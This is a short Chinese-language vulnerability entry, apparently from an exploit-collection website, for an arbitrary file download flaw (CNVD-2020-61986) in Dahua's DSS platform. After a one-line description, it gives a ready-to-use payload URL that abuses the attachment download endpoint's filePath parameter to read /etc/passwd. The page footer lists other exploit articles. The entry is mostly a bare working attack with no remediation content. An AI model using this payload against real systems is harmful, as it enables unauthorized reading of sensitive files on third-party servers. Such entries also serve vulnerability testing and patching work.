# CNVD-2020-61986 大華DSS系統任意文件下載漏洞/zh-cn
==漏洞简介==
浙江大华技术股份有限公司DSS存在任意文件下载漏洞,攻击者可利用该漏洞登录界面下载任意文件获取敏感信息。
==Payload==
http://ip/itc/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
相关推荐
作者
最近一周热门文章
1泛微OA E-Cology sync接口反序列化命令执行
2025年12月15日2致远OA checkComponentFile后台反序列化任意命令执行
2025年12月17日3时空智友ERP sqlResult存在SQL注入
2025年12月14日5华天动力OA存在多个SQL注入
2025年12月14日6网络安全攻防演练与实践分享培训课件.pptx
2025年12月14日会员专属标签云
请登录后查看评论内容